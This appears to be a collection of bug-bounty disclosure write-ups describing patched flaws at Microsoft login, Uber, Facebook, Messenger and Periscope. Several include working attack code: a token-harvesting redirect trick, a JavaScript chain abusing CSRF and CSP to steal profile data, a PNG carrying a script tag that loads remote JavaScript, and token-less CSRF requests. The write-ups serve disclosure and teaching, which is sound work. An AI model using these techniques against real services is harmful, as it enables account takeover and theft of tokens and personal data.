This is pretty similar to Wes’s awesome OAuth CSRF in Live, except it’s in the main Microsoft authentication system rather than the OAuth approval prompt.

Microsoft, being a huge company, have various services spread across multiple domains (*, *, and so on).

To handle authentication across these services, requests are made to a set of login endpoints to get a session for the user.

The flow is as follows:

        <noscript>JavaScript required to sign in</noscript>
        <script type="text/javascript">
            function OnBack(){}function DoSubmit(){var subt=false;if(!subt){subt=true;document.fmHF.submit();}}
    <body onload="javascript:DoSubmit();">
        <form name="fmHF" id="fmHF" action="" method="post" target="_self">
            <input type="hidden" name="t" id="t" value="EgABAgMAAAAEgAAAA...">
  • The service then consumes the token, and logs the user in.

Since the services are hosted on completely separate domains, and therefore cookies can’t be used, the token is the only value needed to authenticate as a user. This is similar-ish to how OAuth works.

What this means is that if we can get the above code to POST the value of t to a server we control, we can impersonate the user.

As expected, if we try and change the value of wreply to a non-Microsoft domain, we receive an error, and the request isn’t processed:

Fun with URL-Encoding and URL Parsing

One fun trick to play around with is URL-encoding parameters multiple times. Occasionally this can be used to bypass different filters, which is the root cause of the bug.

In this case, wreply is URL-decoded before the domain is checked, so an encoded value decodes to one which passes validation, and the request goes through.

<form name="fmHF" id="fmHF" action="" method="post" target="_self">

What’s interesting is that for some values an error is thrown, since the decoded result isn’t a valid URL.

However, appending an extra sequence doesn’t generate an error. Instead, it gives us the following, which is a valid URL:

<form name="fmHF" id="fmHF" action="" method="post" target="_self">

If you’re wondering why this is valid, it’s because the syntax of a URL is as follows:

scheme://username:password@host:port/path?query#fragment

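You can see this rule with Node's WHATWG URL parser: everything before an @ in the authority is treated as userinfo, not the host (the domains below are placeholders, not the real ones from the bug):

```javascript
// Everything before '@' in the authority is userinfo, not the host.
const u = new URL('https://login.example.com@evil.example/callback');

console.log(u.username); // 'login.example.com' -- looks like the allowed host
console.log(u.hostname); // 'evil.example'      -- where the browser actually goes
```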
From this you can tell that the server is doing two checks:

  • The first is a sanity check on the URL, to ensure it’s valid, which it is, since everything before the @ is parsed as the username part of the URL.

  • The second is to determine if the domain is allowed. This second check should fail, since the final domain is not on the allowed list.

It’s clear that the server is decoding wreply repeatedly until no encoded characters remain, and only then validating the domain. This sort of inconsistency is something I’m quite familiar with.
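That decode-until-stable behaviour, contrasted with the single decode the browser effectively sees, can be sketched as follows (the domains are placeholders, and fullyDecode is my naming, not Microsoft's code):

```javascript
// What the validator effectively does: keep decoding until no encoded
// characters remain, then check the hostname.
function fullyDecode(value) {
  let prev;
  do {
    prev = value;
    value = decodeURIComponent(value);
  } while (value !== prev);
  return value;
}

// A double-encoded '/' (%252f) hides an '@' trick: after full decoding
// the allowed host is the hostname, but after a single decode the
// allowed host is merely the userinfo, and the real host is attacker-controlled.
const wreply = 'https://login.example.com%252f@evil.example/';

console.log(new URL(fullyDecode(wreply)).hostname);              // validator's view
console.log(new URL(decodeURIComponent(wreply)).hostname);       // browser's view
```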

Now that we can specify an arbitrary URL to POST the token to, the rest is trivial. We set the redirect to our own domain, which results in:

<form name="fmHF" id="fmHF" action="" method="post" target="_self">

This causes the token to be sent to our site:

Then we simply replay the token ourselves:

<form action="" method="post">
    <input name="t" value="EgABAgMAAAAEgAAAAwAB...">
    <input type="submit">
</form>

Which then gives us complete access to the user’s account:

Note: The token is only valid for the service which issued it - an Outlook token can’t be used for Azure, for example. But it’d be simple enough to create multiple hidden iframes, each with the login URL set to a different service, and harvest tokens that way.
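That note can be sketched as browser-side code; the buildLoginUrls helper, the service slugs, and the parameter names are all hypothetical, since the real login URLs aren't shown here:

```javascript
// Hypothetical sketch: build one login URL per service, each with its
// wreply pointed at our collector, and load each in a hidden iframe.
function buildLoginUrls(loginBase, services, collector) {
  return services.map(function (svc) {
    return loginBase + '?service=' + encodeURIComponent(svc) +
           '&wreply=' + encodeURIComponent(collector);
  });
}

// Browser-only part: one hidden iframe per login URL.
function harvest(urls) {
  urls.forEach(function (url) {
    var f = document.createElement('iframe');
    f.style.display = 'none';
    f.src = url;
    document.body.appendChild(f);
  });
}
```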

This was quite a fun CSRF to find and exploit. Despite CSRF bugs not having the same credibility as other bugs, when discovered in authentication systems their impact can be pretty large.


The hostname in wreply now must end in %2f, which gets URL-decoded to /.

This ensures that the browser only sends the request to the intended host.


  • Sunday, 24th January 2016 - Issue Reported
  • Sunday, 24th January 2016 - Issue Confirmed & Triaged
  • Tuesday, 26th January 2016 - Issue Patched

Now that the Uber bug bounty programme has launched publicly, I can publish some of my favourite submissions, which I’ve been itching to do over the past year. This is part one of maybe two or three posts.

On Uber’s Partners portal, where Drivers can login and update their details, I found a very simple, classic XSS: changing the value of one of the profile fields to a script payload causes the code to be executed, and an alert box popped.

This took all of two minutes to find after signing up, but now comes the fun bit.


Being able to execute additional, arbitrary JavaScript under the context of another site is called Cross-Site Scripting (which I’m assuming 99% of my readers know). Normally you would want to do this against other users in order to yank session cookies, submit XHR requests, and so on.

If you can’t do this against another user - if, for example, the code only executes against your own account - then this is known as a self-XSS.

In this case, it would seem that’s what we’ve found. The address section of your profile is only shown to you (the exception may be if an internal Uber tool also displays the address, but that’s another matter), and we can’t update another user’s address to force it to be executed against them.

I’m always hesitant to send in bugs which have potential (an XSS in this site would be cool), so let’s try and find a way of removing the “self” part from the bug.

Uber OAuth Login Flow

The OAuth flow that Uber uses is pretty typical:

  • User visits an Uber site which requires login, e.g.
  • User is redirected to the authorisation server,
  • User enters their credentials
  • User is redirected back to
    with a code, which can then be exchanged for an access token

In case you haven’t spotted it from the above screenshot, the OAuth callback doesn’t use the recommended state parameter. This introduces a CSRF vulnerability in the login function, which may or may not be considered an important issue.

In addition, there is a CSRF vulnerability in the logout function, which really isn’t considered an issue. Browsing to the logout endpoint destroys the user’s session, and performs a redirect to the same logout function on the other domain.
Since our payload is only available inside our account, we want to log the user into our account, which in turn will execute the payload. However, logging them into our account destroys their session, which destroys a lot of the value of the bug (it’s no longer possible to perform actions on their account). So let’s chain these three minor issues (self-XSS and two CSRFs) together.

For more info on OAuth security, check out @homakov’s awesome guide.

Chaining Minor Bugs

Our plan has three parts to it:

  • First, log the user out of their
    session, but not their
    session. This ensures that we can log them back into their account
  • Second, log the user into our account, so that our payload will be executed
  • Finally, log them back into their account, whilst our code is still running, so that we can access their details

Step 1. Logging Out of Only One Domain

We first want to issue a request to the logout endpoint, so that we can then log them into our account. The problem is that issuing a request to this end-point results in a 302 redirect to the other domain, which destroys the session. We can’t intercept each redirect and drop the request, since the browser follows these implicitly.

However, one trick we can do is to use Content Security Policy to define which sources are allowed to be loaded (I hope you can see the irony in using a feature designed to help mitigate XSS in this context).

We’ll set our policy to only allow requests to the first domain, which will block the redirect to the second:

<!-- Set content security policy to block requests to, so the target maintains their session -->
<meta http-equiv="Content-Security-Policy" content="img-src">
<!-- Logout of -->
<img src="">

This works, as indicated by the CSP violation error message:

Step 2. Logging Into Our Account

This one is relatively simple. We issue a request to the authorisation endpoint to initiate a login (this is needed, otherwise the application won’t accept the callback). Using the CSP trick we prevent the flow from being completed, then we feed in our own code (which can be obtained by logging into our own account), which logs them in to our account.

Since a CSP violation triggers the onerror event handler, this will be used to jump to the next step.

<!-- Set content security policy to block requests to, so the target maintains their session -->
<meta http-equiv="Content-Security-Policy" content="img-src">
<!-- Logout of -->
<img src="" onerror="login();">
<script>
    //Initiate login so that we can redirect them
    var login = function() {
        var loginImg = document.createElement('img');
        loginImg.src = '';
        loginImg.onerror = redir;
    };
    //Redirect them to login with our code
    var redir = function() {
        //Get the code from the URL to make it easy for testing
        var code = window.location.hash.slice(1);
        var loginImg2 = document.createElement('img');
        loginImg2.src = '' + code;
        loginImg2.onerror = function() {
            //Redirect to the profile page with the payload
            window.location = '';
        };
    };
</script>

Step 3. Switching Back to Their Account

This part is the code that will be contained as the XSS payload, stored in our account.

As soon as this payload is executed, we can switch back to their account. This must be in an iframe - we need to be able to continue running our code.

//Create the iframe to log the user out of our account and back into theirs
var loginIframe = document.createElement('iframe');
loginIframe.setAttribute('src', '');
document.body.appendChild(loginIframe);

The contents of the iframe uses the CSP trick again:

<!-- Set content security policy to block requests to, so the target maintains their session -->
<meta http-equiv="Content-Security-Policy" content="img-src">
<!-- Log the user out of our partner account -->
<img src="" onerror="redir();">
<script>
    //Log them into partners via their session on the main domain
    var redir = function() {
        window.location = '';
    };
</script>

The final piece is to create another iframe, so we can grab some of their data.

//Wait a few seconds, then load the profile page, which is now *their* profile
setTimeout(function() {
    var profileIframe = document.createElement('iframe');
    profileIframe.setAttribute('src', '');
    profileIframe.setAttribute('id', 'pi');
    document.body.appendChild(profileIframe);
    //Extract their email as PoC
    profileIframe.onload = function() {
        var d = document.getElementById('pi').contentWindow.document.body.innerHTML;
        var matches = /value="([^"]+)" name="email"/.exec(d);
        alert(matches[1]);
    };
}, 9000);

Since our final iframe is loaded from the same origin as the Profile page containing our JS, we can access the content inside of it (using its contentWindow).

Putting It All Together

After combining all the steps, we have the following attack flow:

  • Add the payload from step 3 to our profile
  • Login to our account, but cancel the callback and make note of the unused code
  • Get the user to visit the file we created from step 2 - this is similar to how you would execute a reflected-XSS against someone
  • The user will then be logged out, and logged into our account
  • The payload from step 3 will be executed
  • In a hidden iframe, they’ll be logged out of our account
  • In another hidden iframe, they’ll be logged into their account
  • We now have an iframe, in the same origin containing the user’s session

This was a fun bug, and proves that it’s worth persevering to show a bug can have a higher impact than originally thought.

Content uploaded to Facebook is stored on their CDN, which is served via various domains (most of which are sub-domains of one of two parent domains).

The captioning feature of Videos also stores the .srt files on the CDN, and I noticed that right-angle brackets were un-encoded in these files.

I was trying to think of ways to get the file interpreted as HTML. Maybe MIME sniffing (since there’s no X-Content-Type-Options header)?

It’s actually a bit easier than that. We can just change the extension to .html (which probably shouldn’t be possible…).

Unfortunately left-angle brackets are stripped out (which I later found out was due to @phwd’s very much related finding), so there’s not much we can do here. Instead, I looked for other files which could also be loaded as text/html.

A lot of the photos/videos on Facebook now seem to contain a hash in the URL (parameters oh and __gda__), which causes an error to be thrown if we modify the file extension.

Luckily, advert images don’t contain these parameters.

All that we have to do now is find a way to embed some HTML into an image. The trouble is that Exif data is stripped out of JPEGs, and iTXt chunks are stripped out of PNGs.

If we try to blindly insert a string into an image and upload it we receive an error.


I started searching for ideas and came across this great blog post: “Encoding Web Shells in PNG IDAT chunks”. This section of the bug was made possible by that post, so props to the author.

The post describes encoding data into the IDAT chunk, which ensures it’ll stay there even after the modifications Facebook’s image uploader makes.

The author kindly provides a proof-of-concept image, which worked perfectly (the PHP shell obviously won’t execute, but it demonstrates that the data survived uploading).

Now, I could have submitted the bug there and then - we’ve got proof that images can be served with a content type of text/html, and angle brackets aren’t encoded (which means we can certainly inject HTML).

But that’s boring, and everyone knows an XSS isn’t an XSS without an alert box.

The author also provides an XSS-ready PNG, which I could just upload and be done with. But since it references a remote JS file, I wasn’t too keen on the bug showing up in a referer log. Plus I wanted to try to create one of these images myself.

As mentioned in the post, the first step is to craft a string that, when compressed using DEFLATE, produces the desired output, which in this case is:

<SCRIPT SRC=//FNT.PE></script>

Rather than trying to create this by hand, I used a brute-force solution (I’m sure there are much better ways, but I wanted to whip up a script and leave it running):

  • Convert the desired output to hex - 3c534352495054205352433d2f2f464e542e50453e3c2f7363726970743e
  • Prepend 0x00 -> 0xff to the string (one to two times)
  • Append 0x00 -> 0xff to the string (one to two times)
  • Attempt to uncompress the string until an error isn’t thrown
  • Check that the result contains our expected string

The script took a while to run, but it produced the following output:


Compressing the above confirms that we get our string back:

fin1te@mbp /tmp » php -r "echo gzdeflate(hex2bin('7ff399281922111510691928276e6e5c1e151e51241f576e69b16375535b6f')) . PHP_EOL;"
??<SCRIPT SRC=//FNT.PE></script>

Combining the result, with the PHP code for reversing PNG filters and generating the image, gives us the following:

Which, when dumped, shows our payload:

fin1te@mbp /tmp » hexdump -C xss-fnt-pe-png.png
00000000  89 50 4e 47 0d 0a 1a 0a  00 00 00 0d 49 48 44 52  |.PNG........IHDR|
00000010  00 00 00 20 00 00 00 20  08 02 00 00 00 fc 18 ed  |... ... ........|
00000020  a3 00 00 00 09 70 48 59  73 00 00 0e c4 00 00 0e  |.....pHYs.......|
00000030  c4 01 95 2b 0e 1b 00 00  00 65 49 44 41 54 48 89  |...+.....eIDATH.|
00000040  63 ac ff 3c 53 43 52 49  50 54 20 53 52 43 3d 2f  |c..<SCRIPT SRC=/|
00000050  2f 46 4e 54 2e 50 45 3e  3c 2f 73 63 72 69 70 74  |/FNT.PE></script|
00000060  3e c3 ea c0 46 8d 17 f3  af de 3d 73 d3 fd 15 cb  |>...F.....=s....|
00000070  43 2f 0f b5 ab a7 af ca  7e 7d 2d ea e2 90 22 ae  |C/......~}-...".|
00000080  73 85 45 60 7a 90 d1 8c  3f 0c a3 60 14 8c 82 51  |s.E`z...?..`...Q|
00000090  30 0a 46 c1 28 18 05 a3  60 14 8c 82 61 00 00 78  |0.F.(...`...a..x|
000000a0  32 1c 02 78 65 1f 48 00  00 00 00 49 45 4e 44 ae  |2..xe.H....IEND.|
000000b0  42 60 82                                          |B`.|

We can then upload it to our advertiser library, and browse to it (with an extension of .html).

What can you do with an XSS on a CDN domain? Not a lot.

All I could come up with is a LinkShim bypass. LinkShim is a script/tool which all external links on Facebook are forced through, and which checks for malicious content.

CDN URLs, however, aren’t LinkShim’d, so we can use this as a bypass.

Moving from the Akamai CDN hostname to *

Redirects are pretty boring. So I thought I’d check to see if any * DNS entries were pointing to the CDN.

I found (I forgot to screenshot the output of dig before the patch, so here’s an entry from Google’s cache):

Browsing to this host with our image as the path loads a JavaScript file from our domain, which then displays an alert box with the hostname.

Any session cookies are marked as HTTPOnly, and we can’t make requests to the main site. What do we do other than popping an alert box?

Enter document.domain

It’s possible for two pages from different origins, but sharing the same parent domain, to interact with each other, provided they both set the document.domain property to the parent domain.

We can easily do this for our page, since we can run arbitrary JavaScript. But we also need to find a page on the main domain which does the same, and doesn’t have an X-Frame-Options header set to DENY or SAMEORIGIN (we’re still cross-origin at this point).

This wasn’t too difficult to find - Facebook has various plugins which are meant to be placed inside an <iframe>.

We can use the Page Plugin. It sets the document.domain property, and also contains fb_dtsg (the CSRF token Facebook uses).

What we now need to do is load the plugin inside an iframe, wait for the onload event to fire, and extract the token from the content.

document.domain = '';

var i = document.createElement('iframe');
i.setAttribute('id', 'i');
i.setAttribute('style', 'visibility:hidden;width:0px;height:0px;');
i.setAttribute('src', '');

i.onload = function(){
    alert(document.domain + "\nfb_dtsg: " + i.contentWindow.document.getElementsByName('fb_dtsg')[0].value);
};
document.body.appendChild(i);

Notice how the alert box now shows the parent domain, not the CDN hostname.

We now have access to the user’s CSRF token, which means we can make arbitrary requests on their behalf (such as posting a status, etc).

It’s also possible to issue XHR requests via the iframe to extract data from the main site (rather than blindly posting data with the token).

So it turns out an XSS on the CDN can do pretty much everything that one on the main site can.


Facebook quickly hot-fixed the issue by removing the forward DNS entry for

Whilst the content type issue still exists, it’s a lot less severe since the files are hosted on a sandboxed domain.

Bonus ASCII Art

One easter-egg I found was that if you append .txt or .html to the URL (rather than replace the file extension), you get a cool ASCII art version of the image. This also works for images on Instagram (since they share the same CDN).

Try it out yourself:

I originally wasn’t going to publish this, but @phwd wanted to hear about some of my recent bugs so this post is dedicated to him.

This issue was also found by @mazen160, who blogged about it back in June.

When the site launched back in April, I quickly had a look for any low-hanging fruit.

One of the first things to do is check end-points for Cross-Site Request Forgery issues. This is whereby an attacker can abuse the fact that cookies are implicitly sent with a request (regardless of where the request is made from), and perform actions on another user’s behalf, such as sending a message or updating a status.

There are different ways of mitigating this (with varying results), but usually it’s achieved by sending a non-guessable token with each request, then either comparing it to a value stored server-side, or decrypting it and verifying the contents.

The way I normally check for these is as follows:

  1. Perform the request without modifying the parameters, so we can see what the expected result is
  2. Remove the CSRF token completely (in this case, the fb_dtsg parameter)
  3. Modify one of the characters in the token (but keep the length the same)
  4. Remove the value of the token (but leave the parameter in place)
  5. Convert to a GET request

If any of the above steps produce the same result as #1 then we know that the end-point is likely to be vulnerable (though in some instances you might get a successful response when in fact no data has been modified, meaning the token check hasn’t really been bypassed).
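Steps 2-4 of that checklist can be captured in a small helper that produces the mutated parameter sets to replay against the baseline (the function and its naming are mine; only the fb_dtsg parameter name comes from the post):

```javascript
// Generate the CSRF-check mutations of a request's parameters.
// Each variant should be replayed and its result compared to step 1.
function csrfVariants(params, tokenName) {
  const variants = [];

  // 2. Remove the token completely
  const removed = Object.assign({}, params);
  delete removed[tokenName];
  variants.push({ name: 'token removed', params: removed });

  // 3. Modify one character, keeping the length the same
  const tok = params[tokenName];
  const flipped = (tok[0] === 'A' ? 'B' : 'A') + tok.slice(1);
  variants.push({ name: 'token tampered',
                  params: Object.assign({}, params, { [tokenName]: flipped }) });

  // 4. Empty the value, but leave the parameter in place
  variants.push({ name: 'token empty',
                  params: Object.assign({}, params, { [tokenName]: '' }) });

  return variants;
}
```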

Normally, on Facebook, the response is one of two, depending on whether the request is an AJAX request or not (indicated by the __a parameter).

Either a redirect to /common/invalid_request.php:

Or an error message:

I submitted the following request to change the sound_enabled setting, without fb_dtsg:

POST /settings/edit/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded


Which surprisingly gave me the following response:

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 3559

for (;;);{"__ar":1,"payload":[],"jsmods":{"instances":[["m_a_0",["MarketingLogger"],[null,{"is_mobile":false,"controller_name":"XMessengerDotComSettingsEditController"

I tried another end-point, this time to remove a user from a group thread.

POST /chat/remove_participants/?uid=100...&tid=153... HTTP/1.1
Content-Type: application/x-www-form-urlencoded


Which also worked:

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 136

for (;;);{"__ar":1,"payload":null,"domops":[["replace","^.fbProfileBrowserListItem",true,null]],"bootloadable":{},"ixData":{},"lid":"0"}

After trying one more I realised that the check was missing on every request.


Simple and quick fix - tokens are now properly checked on every request.

I haven’t blogged for quite some time, so I thought it was worth re-launching with an interesting, albeit simple, high-impact bug.

Periscope is an iOS/Android app, owned by Twitter, used for live streaming. To manage the millions of users, a web-based administration panel is used.

When you browse to the site, all requests are redirected to /auth?redirect=/ (since we don’t have a valid session), which in turn redirects to Google for authentication.

The redirected URL, shown below, contains various parameters, but the most interesting one is hd. This is used to restrict logins to a specific domain, in this case

If we try and login with an account on a non-matching domain, we’re redirected back to the account selection page, and if we try again we get redirected back to the same place, and so on.

However, we can simply remove this parameter. There’s no signature in the URL to prevent us from making modifications, and as indicated in the documentation, the onus is on the application to validate the returned token.

This gives us the following login URL (you may also notice I’ve removed the Google+ scope, this is purely because my test account isn’t signed up for it):

Browsing to this new URL prompts us to authorise the application.

After clicking “Accept”, a redirect is issued back to the administration panel, with our code as a parameter.

This is where the application should then exchange the code for an access token, and validate the returned user ID against a whitelist, or at the very least verify that the domain is the expected one.

But, in this case, the assumption is made that if you managed to login, you are an employee with a company email address.

The requested userinfo.profile permission doesn’t contain the user’s email address, so the application can’t validate it if it tried.
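For contrast, here's a sketch of the check the callback could perform once it actually has the user's email (the profile shape follows Google's userinfo response when the email scope is granted; ALLOWED_DOMAIN and the function name are placeholders):

```javascript
// Sketch of the check the callback should perform after exchanging the
// code for a token and fetching the user's profile.
const ALLOWED_DOMAIN = 'example.com'; // placeholder, not the real value

function isAuthorised(profile) {
  // Without the email scope, profile.email is simply absent -- which is
  // why the original deployment couldn't have validated it.
  if (!profile || !profile.email || profile.email_verified !== true) {
    return false;
  }
  return profile.email.toLowerCase().endsWith('@' + ALLOWED_DOMAIN);
}
```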

This then presents us with the admin panel.

From here we can now manage various aspects of Periscope, including users and streams.


Twitter fixed this by making two changes. The first is to request an additional permission:

The second is to correctly validate the user on callback.

Now, the application returns a 401 when trying to authenticate with an invalid user:

HTTP/1.1 401 Unauthorized
Content-Type: text/html; charset=utf-8
Location: /Login
Strict-Transport-Security: max-age=31536000; preload
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Xss-Protection: 1; mode=block
Content-Length: 36